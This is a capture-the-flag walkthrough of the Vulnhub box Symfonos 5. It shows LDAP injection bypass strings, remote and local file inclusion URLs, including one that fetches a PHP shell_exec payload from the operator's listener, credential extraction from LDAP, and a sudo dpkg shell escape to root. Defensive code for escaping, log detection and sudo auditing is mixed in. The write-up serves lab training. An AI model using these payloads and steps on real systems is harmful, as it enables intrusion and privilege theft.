Vulnhub: Symfonos 5

What happened to Symfonos 4? Sorry, but for some unbeknownst reasons beyond the cosmos, I could not get the target VM working in the lab.

General Information / Brief

Another target from the Symfonos series. The vulnerability exploited in this target (LDAP injection) may sound out of scope by name, but the actual exploitation is similar (even identical) to another service vulnerability: SQL injection. Compare a remote stack-based buffer overflow against an FTP server with one against a POP3 server: different service, same concept, and the overall lesson can be applied in operator training.

Scope

Fourth runner-up in the series is Symfonos 5. The author's description, "based machine designed to teach people the importance of understanding from the interior.", is accurate: the box demonstrates continued enumeration and a variety of exploitation techniques to achieve the objective. The information leak exists; the operator just needs to find it.

Reconnaissance


Target        Address
Symfonos 5    192.168.234.140

Quick initial scan on target to note open ports and services.

rustscan -a 192.168.234.140 -- -sC -sV

Initial scan result.

$ rustscan -a 192.168.234.140 -- -sC -sV
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
...
Open 192.168.234.140:22
Open 192.168.234.140:80
Open 192.168.234.140:389
Open 192.168.234.140:636
[~] Starting Script(s)
...
PORT    STATE SERVICE  REASON  VERSION
22/tcp  open  ssh      syn-ack OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
...
80/tcp  open  http     syn-ack Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.29 (Ubuntu)
389/tcp open  ldap     syn-ack OpenLDAP 2.2.X - 2.3.X
636/tcp open  ldapssl? syn-ack
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
...

Nmap scan of each open port for service version and default nmap scripts.

nmap -sC -sV -p22,80,389,636 192.168.234.140
  • -sC: run default nmap scripts
  • -sV: detect service version

We get back the following result showing that four ports are open:

  • Port 22: OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
  • Port 80: Apache httpd 2.4.29 ((Ubuntu))
  • Port 389: OpenLDAP 2.2.X - 2.3.X
  • Port 636: ldapssl?

Initial nmap service and script scan result.

Check: same result as above.

Before probing ports, re-run and re-check with a full nmap scan in a background session for the full report.

nmap -sC -sV -O -p- 192.168.234.140
  • -sC: run default nmap scripts
  • -sV: detect service version
  • -O: detect OS

We get back the following result showing that no new ports are open:

None.

Run an nmap scan with the -sU flag to perform a UDP scan.

nmap -sU --top-port 1000 192.168.234.140

We get back the following result showing that one port is open:

  • Port 137: dhcpc (Filtered)

Nmap reports the following result.

# nmap -sU --top-port 1000 192.168.234.140
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-25 02:38 EDT
Nmap scan report for 192.168.234.140
Host is up (0.00031s latency).
Not shown: 999 closed udp ports (port-unreach)
PORT   STATE         SERVICE
68/udp open|filtered dhcpc
MAC Address: 00:0C:29:25:50:B2 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1011.99 seconds

Enumeration


Port 389/636 - LDAP

Probing the target ports with the nmap LDAP scripts shows the target's base distinguished name in namingContexts as dc=symfonos,dc=local, which gives the domain name symfonos.local. On the operator workstation, edit /etc/hosts and insert 192.168.234.140 symfonos.local to avoid name resolution issues.

$ nmap -n -sV -p389,636 --script=ldap* 192.168.234.140
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-25 04:07 EDT
Nmap scan report for 192.168.234.140
Host is up (0.00024s latency).

Bug in ldap-brute: no string output.
PORT    STATE SERVICE  VERSION
389/tcp open  ldap     OpenLDAP 2.2.X - 2.3.X
| ldap-rootdse: 
| LDAP Results
|   <ROOT>
|       namingContexts: dc=symfonos,dc=local
|       supportedControl: 2.16.840.1.113730.3.4.18
|       supportedControl: 2.16.840.1.113730.3.4.2
|       supportedControl: 1.3.6.1.4.1.4203.1.10.1
|       supportedControl: 1.3.6.1.1.22
|       supportedControl: 1.2.840.113556.1.4.319
|       supportedControl: 1.2.826.0.1.3344810.2.3
|       supportedControl: 1.3.6.1.1.13.2
|       supportedControl: 1.3.6.1.1.13.1
|       supportedControl: 1.3.6.1.1.12
|       supportedExtension: 1.3.6.1.4.1.4203.1.11.1
|       supportedExtension: 1.3.6.1.4.1.4203.1.11.3
|       supportedExtension: 1.3.6.1.1.8
|       supportedLDAPVersion: 3
|       supportedSASLMechanisms: SCRAM-SHA-1
|       supportedSASLMechanisms: SCRAM-SHA-256
|       supportedSASLMechanisms: GS2-IAKERB
|       supportedSASLMechanisms: GS2-KRB5
|       supportedSASLMechanisms: GSS-SPNEGO
|       supportedSASLMechanisms: GSSAPI
|       supportedSASLMechanisms: DIGEST-MD5
|       supportedSASLMechanisms: OTP
|       supportedSASLMechanisms: NTLM
|       supportedSASLMechanisms: CRAM-MD5
|_      subschemaSubentry: cn=Subschema
636/tcp open  ldapssl?

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.38 seconds

The operator can also probe with ldapsearch, using the -s flag to specify the search scope (base, one, sub, or children), and confirm the target's namingContexts as dc=symfonos,dc=local.

ldapsearch -H ldap://192.168.234.140 -x -s base namingcontexts

An anonymous bind check (without binding as any user account) can be done with the following command, using the -b flag to specify the base distinguished name for the search. With no filter specified, the default (objectclass=*) searches every object in the target directory tree (dump all, sort later).

$ ldapsearch -x -H ldap://192.168.234.140 -b "dc=symfonos,dc=local"

# extended LDIF
#
# LDAPv3
# base <dc=symfonos,dc=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 32 No such object

The returned result verifies that anonymous binds are allowed, but it does not dump any useful information.

Port 80 - HTTP

Probing the target port: front-end view.

Viewing the source shows a single image, zeus.jpg, which contains no useful metadata per exiftool. A directory and extension scan yields the following report.

$ feroxbuster --url http://192.168.234.140 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,txt,html,cgi,sh,bak -f -d 2 -C 403,404

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.7.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.234.140
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/common.txt
 💢  Status Code Filters   │ [403, 404]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.7.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 💲  Extensions            │ [php, txt, html, cgi, sh, bak]
 🏁  HTTP methods          │ [GET]
 🪓  Add Slash             │ true
 🔃  Recursion Depth       │ 2
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200      GET       18l       21w      207c http://192.168.234.140/
200      GET       39l       79w     1650c http://192.168.234.140/admin.php/
302      GET       28l       61w      962c http://192.168.234.140/home.php => admin.php
200      GET       18l       21w      207c http://192.168.234.140/index.html
302      GET        0l        0w        0c http://192.168.234.140/logout.php => admin.php
200      GET      815l     3019w    36057c http://192.168.234.140/icons/README.html
200      GET       20l       96w     1746c http://192.168.234.140/static/

Probing /static reports a directory listing with image files.

Extracting metadata from all the zeus jpg files with exiftool yields nothing useful. Note that home.php and logout.php both redirect to admin.php. Probing /admin.php reports an administrator login panel; the application vendor and version are unknown. Brute force with known default credential sets failed.

Initial Access


Exploitation Synopsis:

In this exercise the operator will bypass the admin login panel via LDAP injection, exploit a local file inclusion vulnerability in the admin control panel to leak the credentials for the target LDAP service, and dump LDAP data to obtain credentials for an initial shell session on the target.

Exploitation Incident Report:

Probing the target login form /admin.php for a vendor or version information leak failed, and a fuzzing session with SQL injection payloads did not yield results. Since the target has an LDAP service active on ports 389 and 636, the operator can check for LDAP injection.

Exploitation (LDAP Injection - Fuzz)

In the following task the operator will fuzz the /admin.php administrator panel for LDAP injection with Burp Suite and wfuzz (demonstration only; tool choice is option-free).

Burp suite:

Capture a login attempt to the administrator panel; the intercepted request is a standard GET to the PHP file with username and password parameters.

Send it to Intruder. A fuzzing session should follow a checklist order for accurate results: start with the username field, then the password field, then both the username and password fields.

Insert the wordlist and start the attack.

Note:

  • Using the seclists LDAP wordlist at /usr/share/seclists/Fuzzing/LDAP.Fuzzing.txt did not yield any result. (sudo apt install seclists)
  • The research phase yielded an additional payload wordlist from a user on GitHub, but as of the time of writing this article the user is no longer hosting the wordlist repo.
  • Instead, the reader can use the payload wordlist from HackTricks/ldap-injection. (Confirmed to be the same wordlist as the GitHub user's, appended to the seclists LDAP.Fuzzing.txt wordlist.)
  • Recommended, but option-free: update the seclists LDAP.Fuzzing.txt wordlist with the new version from HackTricks/ldap-injection.

Invalid logins return 200 responses; the first 302 response appears on the payload string *))%00, and every request afterwards also returns 302.

Changing the resource pool to a maximum of 1 concurrent request and relaunching the fuzz did not change the trailing 302 responses. The target web application has marked the current session cookie as a valid login, so every request afterwards is also treated as valid. This can be confirmed by forwarding the current intercepted request to the target, which bypasses the login automatically.

wfuzz:

To use wfuzz, retrieve the URL (with its query parameters) recorded during the known default credential checks.

The operator can fuzz each parameter to check for LDAP injection, starting with the username field.

wfuzz -c -z file,/usr/share/seclists/Fuzzing/LDAP.Fuzzing.txt -u "http://symfonos.local/admin.php?username=FUZZ&password=password"

The result shows a 302 response on the payload string *))%00.

Fuzzing both the username and password fields returns the following result.

wfuzz -c -z file,/usr/share/seclists/Fuzzing/LDAP.Fuzzing.txt -u "http://symfonos.local/admin.php?username=FUZZ&password=FUZZ"

Note that the payload strings *))%00 and * in both the username and password fields are valid bypasses. An HTTP 302 is a redirect response; in this task, a valid login redirects to the internal dashboard panel at /home.php.
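As an added illustration (not code from the original post or from the box's admin.php), the following Python models why the bypass strings above work against a filter built by string concatenation, and shows the RFC 4515 escaping that neutralises them. The filter shape (&(uid=...)(userPassword=...)) is an assumption; the post only shows the application's behaviour, not its source.

```python
import re
from urllib.parse import unquote

# RFC 4515 section 3: characters that must be escaped inside a filter value.
_FILTER_SPECIALS = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value: str) -> str:
    """Escape a request-supplied value before placing it in an LDAP filter."""
    return "".join(_FILTER_SPECIALS.get(ch, ch) for ch in value)


def build_filter_unsafe(user: str, password: str) -> str:
    """Vulnerable construction: raw request values pasted into the filter.
    The filter shape is an assumption about the target's admin.php."""
    return f"(&(uid={user})(userPassword={password}))"


def build_filter_safe(user: str, password: str) -> str:
    """Hardened construction: every value goes through escape_filter_value."""
    return (f"(&(uid={escape_filter_value(user)})"
            f"(userPassword={escape_filter_value(password)}))")


def effective_filter(filter_str: str) -> str:
    """Model a C-string based LDAP client library: the filter ends at the
    first raw NUL byte, which is what %00 in the URL becomes after decoding."""
    nul = filter_str.find("\x00")
    return filter_str if nul < 0 else filter_str[:nul]


def password_is_checked(filter_str: str) -> bool:
    """True only if the filter the server actually sees still asserts a
    concrete userPassword value: the clause survives truncation and its
    value contains no unescaped wildcard."""
    match = re.search(r"\(userPassword=([^()]*)\)", effective_filter(filter_str))
    return bool(match) and "*" not in match.group(1)


if __name__ == "__main__":
    # The two bypass strings found by fuzzing, as they arrive after URL decoding.
    for user, password in ((unquote("*))%00"), "password"), ("*", "*")):
        for builder in (build_filter_unsafe, build_filter_safe):
            f = builder(user, password)
            print(f"{builder.__name__:20} sees {effective_filter(f)!r:50} "
                  f"password checked: {password_is_checked(f)}")
```

The unsafe builder loses the userPassword clause entirely on *))%00 and turns it into a match-anything wildcard on *, while the escaped filter keeps both values literal.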

Exploitation (LDAP Injection - Bypass)

With the list of bypass strings, the operator is free to inject any of them into the panel to bypass the login.

/home.php is the access control panel.

Exploitation (Access Control Panel - Analysis)

The control panel appears to be custom. The 'Portraits' link shows the same images as /static, but instead of linking to portraits.php directly, the link goes through home.php with a url request parameter that points at the loopback address to retrieve portraits.php.

Viewing the source confirms the link is hardcoded, using the home.php url parameter instead of linking to the local portraits.php file.

This profile points to a possible file inclusion (remote and/or local) vulnerability.

Exploitation (Access Control Panel - File Inclusion)

Remote File Inclusion - Proof-of-Concept:

To test for remote file inclusion, the operator repurposes the url parameter to point at an HTTP listener on the operator workstation. Start the listener, then browse to the following address.

http://symfonos.local/home.php?url=http://192.168.234.133/test

The response at the listener confirms the remote file inclusion vulnerability: the target requests the resource via an HTTP GET.

Remote File Inclusion - Command Execution:

Remote file inclusion can force the target web application to include arbitrary code files imported from another location; in this task, from the HTTP listener on the operator workstation, importing a payload file that executes operating system commands. Generate the PHP payload file cmd.php to execute a shell command and echo the result.

<?php echo shell_exec("whoami");?>

Craft the attack string to request /cmd.php from the HTTP listener and send it.

http://symfonos.local/home.php?url=http://192.168.234.133/cmd.php

The result is a valid request to the listener for the payload file, but no command execution output is displayed. Viewing the source shows the whole PHP payload displayed as-is, not executed.

The task has failed, as the target does not execute the included PHP code (possibly the PHP engine is disabled for it).

Local File Inclusion - Proof-of-Concept:

Since the PHP payload file could be viewed as text, the next task is to attempt to view local files on the target. The operator can retrieve the target's /etc/passwd file with the following attack string.

http://symfonos.local/home.php?url=/etc/passwd

The result confirms the target is vulnerable to local file inclusion.

Note: view the source to prettify the returned output.
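From the defender's side, both the remote and the local inclusion requests above leave a clear trace in the web server log. The following Python, added here as an example (not from the post), parses Apache combined-format lines, pulls the home.php url= parameter and classifies it; the same classifier is the allow-list a hardened home.php would apply before including anything. The log lines, the loopback portraits.php link and the allow-list are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format log lines (not from the post). The requests
# reproduce the ones made above; the loopback portraits.php link is an assumption.
SAMPLE_LOG = """\
192.168.234.133 - - [25/Oct/2022:05:01:10 -0400] "GET /home.php?url=http://127.0.0.1/portraits.php HTTP/1.1" 200 1746 "-" "Mozilla/5.0"
192.168.234.133 - - [25/Oct/2022:05:02:31 -0400] "GET /home.php?url=http://192.168.234.133/test HTTP/1.1" 200 12 "-" "Mozilla/5.0"
192.168.234.133 - - [25/Oct/2022:05:03:02 -0400] "GET /home.php?url=http://192.168.234.133/cmd.php HTTP/1.1" 200 36 "-" "Mozilla/5.0"
192.168.234.133 - - [25/Oct/2022:05:04:15 -0400] "GET /home.php?url=/etc/passwd HTTP/1.1" 200 1407 "-" "Mozilla/5.0"
192.168.234.133 - - [25/Oct/2022:05:05:40 -0400] "GET /home.php?url=..%2F..%2Fadmin.php HTTP/1.1" 200 1650 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# The only page home.php legitimately needs to include (assumption).
ALLOWED_INCLUDES = {"portraits.php"}

def classify_include(value: str) -> str:
    """Classify a decoded url= value as 'allowed', 'remote', 'local-absolute',
    'traversal' or 'unknown'; a hardened home.php rejects all but 'allowed'."""
    parts = urlsplit(value)
    if parts.scheme:
        # The loopback self-link is the one legitimate URL form.
        if parts.hostname in ("127.0.0.1", "localhost") \
                and parts.path.lstrip("/") in ALLOWED_INCLUDES:
            return "allowed"
        return "remote"
    if value.startswith("/"):
        return "local-absolute"
    if ".." in value.split("/"):
        return "traversal"
    return "allowed" if value in ALLOWED_INCLUDES else "unknown"

def find_inclusion_attempts(log_text: str):
    """Return (ip, timestamp, url value, verdict) for every home.php request
    whose url= parameter is not on the allow-list."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = urlsplit(m.group("target"))
        if target.path != "/home.php":
            continue
        # parse_qs percent-decodes, so ..%2F.. arrives here as ../..
        for value in parse_qs(target.query, keep_blank_values=True).get("url", []):
            verdict = classify_include(value)
            if verdict != "allowed":
                hits.append((m.group("ip"), m.group("ts"), value, verdict))
    return hits

if __name__ == "__main__":
    print(*find_inclusion_attempts(SAMPLE_LOG), sep="\n")
```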

Local File Inclusion - Internal Analysis:

The operator was not able to locate target log files for poisoning (no permission, or a non-default location). Since the vulnerability returns PHP files without rendering them through the PHP engine, the operator can review the PHP files in the web root found during the external HTTP analysis. Including home.php activated its HTML portion and produced a doubled panel view without showing any source code.

View the source of the home.php result to display its PHP source code. No useful information to report.

Analysis of admin.php yields the LDAP configuration in plain text. The 'authLdap' function connects and binds to a remote LDAP server using hardcoded credentials.

Possible admin credentials (LDAP):

Username: cn=admin,dc=symfonos,dc=local
Password: qMDdyZh3cT6eeAWD

Exploitation (Remote Access - LDAP)

With possible credentials, the operator can probe the target LDAP service to test them via ldapsearch or the nmap ldap-search script (option-free).

ldapsearch -x -H ldap://192.168.234.140 -D "cn=admin,dc=symfonos,dc=local" -w "qMDdyZh3cT6eeAWD" -b "DC=symfonos,DC=local"
nmap --script ldap-search --script-args 'ldap.username="admin,dc=symfonos,dc=local", ldap.password="qMDdyZh3cT6eeAWD"' -p389,636 192.168.234.140

Note the base64-encoded strings in the userPassword field for user admin (the LDAP administrator) and user zeus. Current access uses the admin credentials; targeting user zeus, base64-decoding returns the following result.

$ echo "Y2V0a0tmNHdDdUhDOUZFVA==" | base64 -d
cetkKf4wCuHC9FET

The result is a possible credential for user zeus.

Password: cetkKf4wCuHC9FET

Note: the nmap ldap-search script can automatically decode the base64 portion.

Exploitation (Remote Access - SSH)

LDAP analysis of user zeus shows loginShell: /bin/bash. With possible credentials and SSH being the only entry point left on the target, the operator can attempt an interactive connection for initial access.

ssh zeus@symfonos.local
cetkKf4wCuHC9FET

Successful exploitation should yield a session with user zeus privileges.

Privilege Escalation


Exploitation Synopsis:

In this exercise the operator will use the target user session to exploit misconfigured sudo access and elevate privileges to superuser.

Exploitation Incident Report:

Internal analysis of the current session: check the sudo listing and note /usr/bin/dpkg set to run with root privilege and no password required.

Check the GTFOBins dpkg entry, section sudo. Exploitation to elevate privilege can be done with the following command set:

  • sudo dpkg -l
  • !/bin/sh (Used !/bin/bash in this task.)
  • The first command lists the packages installed on the target system and is too long to fit in a screenshot.
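A defender-side check for the same misconfiguration, added here as an example (not from the post): parse the output of sudo -l and flag rules that hand a user a pager-spawning binary, rated high when NOPASSWD removes the credential prompt. The sample output, the host name symfonos5 and the extra apt-get rule are constructed assumptions.

```python
import re

# Constructed sudo -l output matching the finding above (not from the post);
# the host name "symfonos5" and the apt-get line are assumptions.
SAMPLE_SUDO_L = """\
Matching Defaults entries for zeus on symfonos5:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User zeus may run the following commands on symfonos5:
    (root) NOPASSWD: /usr/bin/dpkg
    (root) /usr/bin/apt-get
"""

# Binaries whose normal operation drops the caller into an interactive pager,
# from which a shell can be spawned (dpkg -l on this box is one of them).
PAGER_SPAWNERS = {"dpkg", "apt-get", "apt", "less", "more", "man"}

# One sudo rule line: "(runas) [TAG: ...] command[, command]"
RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$')


def audit_sudo_rules(text: str):
    """Return one finding per sudo rule that grants ALL or a pager-spawning
    binary; NOPASSWD makes it high severity since no credential is needed."""
    findings = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            words = cmd.split()
            if not words:
                continue
            binary = words[0]
            if binary == "ALL" or binary.rsplit("/", 1)[-1] in PAGER_SPAWNERS:
                findings.append({"runas": m.group("runas").strip(),
                                 "command": binary, "nopasswd": nopasswd,
                                 "severity": "high" if nopasswd else "medium"})
    return findings


if __name__ == "__main__":
    for finding in audit_sudo_rules(SAMPLE_SUDO_L):
        print(finding)
```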

Successful exploitation should elevate the session to root privilege.

Proof

Exploitation Post-Incident Report


  • Injection Bypass (methodology procedures to follow):
    • If target has a web portal with credential requirement and target has SQL ports, try SQL injection.
    • If target has a web portal with credential requirement and target has LDAP ports, try LDAP injection.
  • Injection Bypass (Fuzzing): each tool has its pros and cons, and knowing how to use all of them to perform the same task can sometimes be a cure for your insanity check. (No trailing 302 responses on the target when using wfuzz.)

Spelling errors or any other issues to report? Please, be kind and let me know.

Until then...
